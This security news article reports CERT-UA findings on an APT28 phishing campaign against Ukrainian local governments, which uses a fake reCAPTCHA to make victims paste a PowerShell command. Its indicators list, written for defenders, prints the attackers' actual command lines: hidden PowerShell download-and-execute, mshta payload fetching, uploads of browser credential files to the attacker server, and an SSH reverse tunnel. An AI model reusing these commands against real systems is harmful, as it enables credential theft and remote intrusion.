Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU) connected hackers that is targeting local governments.
The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or “Fancy Bear.” Using a novel approach, attackers lure recipients into executing malicious PowerShell commands directly from their clipboard—a new technique for delivering malware with minimal interaction.
Google’s reCAPTCHA Lookalike
Emails flagged by CERT-UA were found circulating within local government offices under the subject line “Table Replacement.” Instead of standard attachments, these emails embed a link mimicking a Google spreadsheet.
Clicking the link initiates an imitation of Google’s reCAPTCHA, a tactic used to disarm suspicion by mimicking a bot prevention screen. However, unlike legitimate reCAPTCHA prompts, this decoy performs an unseen action: it copies a malicious PowerShell command directly to the user’s clipboard.
Following this, instructions prompt users to press “Win+R,” which opens the command prompt, followed by “Ctrl+V” to paste and then “Enter” to execute it. Once executed, the payload launches, compromising the system.
APT28’s tactics demonstrate how these groups exploit familiar actions in routine tasks to mask their intentions. This technique capitalizes on basic system functions and leverages users’ trust in seemingly benign prompts, such as bot verification.
CERT-UA analysis reveals that the command initiates a download and execution sequence. It launches “browser.hta,” a malicious HTML application, which in turn executes “Browser.ps1,” a PowerShell script designed to steal data from popular browsers, including Chrome, Edge, Opera, and Firefox.
Additionally, it uses an SSH tunnel for exfiltration, allowing stolen credentials and other sensitive data to be transported directly to the attackers. One of the more concerning aspects involves the script’s capability to download and run the Metasploit framework, a tool used widely in penetration testing but increasingly getting popular among threat actors.
Fancy Bear Gets Fancy with its Expanding Arsenal
This isn’t the first time Ukrainian entities faced APT28’s targeted operations. CERT-UA reported in September that the group used a Roundcube email vulnerability (CVE-2023-43770) to redirect email data.
Exploiting this vulnerability enabled attackers to implant a filter that auto-forwarded emails to an attacker-controlled address. During that attack, CERT-UA found that at least ten compromised government email accounts were used to transmit further exploits to Ukrainian defense contacts.
In both attacks, APT28 used a compromised server, mail.zhblz[.]com, for control. The IP linked to this server (203.161.50[.]145) has surfaced in prior campaigns, signifying APT28’s evolving operational infrastructure to evade detection while maintaining continuity across attacks.
With APT28’s ongoing activity, CERT-UA has recommended that government agencies be on the lookout of increasingly targeted spear-phishing campaigns designed to exploit both user trust and routine tasks.
Also read: Russian Hacker Group APT28 Launches HeadLace Malware via Fake Car Ads to Target Diplomats
Indicators of Compromise Shared by CERT-UA
File Hashes:
e9cb6270f09e3324e6620b8c909a83c6 d34ee70f162ce1dab6a80a6a3c8dabd8d2b1a77345be5b1d956c765752b11802 Browser.ps1 d73124dbb5d8e5702df065a122878740 4e1bc758f08593a873e5e1d6f7d4eac05f690841abc90ddfa713c2bec4f9970f Browser.ps1 597bd15ff25636d9cde61157c2a3c8a2 5200a4e1bb5174a3203ce603c34625493a5a88f0dfb98ed5856b18655fb7ba60 browser.hta 446bab23379df08fecbab6fe9b00344e 3ec9a66609f1bea8f30845e5dbcf927cf0b3e92e40ef40272fdf6d784ba0d0af zapit.exe [METASPLOIT] f389247be7524e2d4afc98f6811622fe e3a3abf8c80637445bab387be288b6475992b6b556cb55a5a8c366401fb864c5 rdp.exe 981943d2e7ec0ab3834c639f49cc4b42 6bbf2b86e023f132416f40690b0386bd00e00cf3e1bef725dec92df7f1cd1007 id_rsa d26920b81f4e6b014a0d63169e68dfa7 edb81219b7728fa2ea1d97d5b3189f498ed09a72b800e115f12843f852b2a441 ssh.exe (legit) d1ccc802272a380b32338d17b2ac40a1 2446ab2e4dc85dc8b27141b2c1f777a01706f16d6608f4b5b0990f8b80dea9e0 libcrypto.dll (legit)
Network:
hXXps://docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com/document (tcp)://mail.zhblz[.]com:8443 hXXps://mail.zhblz[.]com hXXps://mail.zhblz[.]com/B hXXps://mail.zhblz[.]com/b hXXps://mail.zhblz[.]com/endpoint hXXps://mail.zhblz[.]com/upload hXXps://mail.zhblz[.]com/z hXXps://mail.zhblz[.]com/id_rsa hXXps://mail.zhblz[.]com/libcrypto hXXps://mail.zhblz[.]com/ssh (tcp)://203[.]161.50.145:22 (tcp)://203[.]161.50.145:6211 (tcp)://45[.]61.169.221:445 doc.gmail.com.gyehddhrggdii323sdhnshiswh2udhqjwdhhfjcjeuejcj.zhblz[.]com docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com mail.zhblz[.]com 203[.]161.50.145 45[.]61.169.221 Indicators from incident CERT-UA#10859 (unauthorized access to mailboxes) 103[.]50.33.50 103[.]50.33.54 109[.]236.63.165 185[.]197.248.94 194[.]35.121.200 194[.]35.121.202 194[.]35.121.50 195[.]64.155.64 198[.]54.117.242 203[.]161.50.145 37[.]19.218.144 37[.]19.218.146 37[.]19.218.156 37[.]19.218.157 37[.]19.218.160 37[.]19.218.168 37[.]19.218.174 37[.]19.218.183 45[.]155.43.118 45[.]155.43.121 45[.]94.211.159 45[.]94.211.161 45[.]94.211.164 80[.]77.25.206 95[.]214.216.76 95[.]214.216.78 95[.]214.217.94 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 exchangelib/5.4.2 (python-requests/2.32.3)
Hosts:
%APPDATA%\id_rsa %APPDATA%\zapit.exe %APPDATA%\ssh.exe %APPDATA%\libcrypto.dll C:\Users\Malgus\source\repos\rdp\rdp\obj\Debug\rdp.pdb mshta https://mail.zhblz.com/b ssh [email protected] -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no -o "PermitLocalCommand=yes" -o "LocalCommand=ssh -i \\45.61.169.221\key.pem [email protected] .1.1" %APPDATA%\ssh.exe [email protected] -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no powershell -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('https://mail.zhblz.com/B');pumpndump -hq https://mail.zhblz. com;mshta https://mail.zhblz.com/b # ✅ ''I am not a robot - reCAPTCHA ID: {verification_id}''" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename='logins.json';file='<Base64EncodedData> '}|ConvertTo-Json) -ContentType 'application/json'" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename='key4.db';file='<Base64EncodedData> '}|ConvertTo-Json) -ContentType 'application/json'" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/libcrypto -OutFile %APPDATA%\libcrypto.dll" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/ssh -OutFile %APPDATA%\ssh.exe" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/z -OutFile %APPDATA%\zapit.exe" powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest https://mail.zhblz.com/id_rsa -OutFile $env:APPDATA\id_rsa"
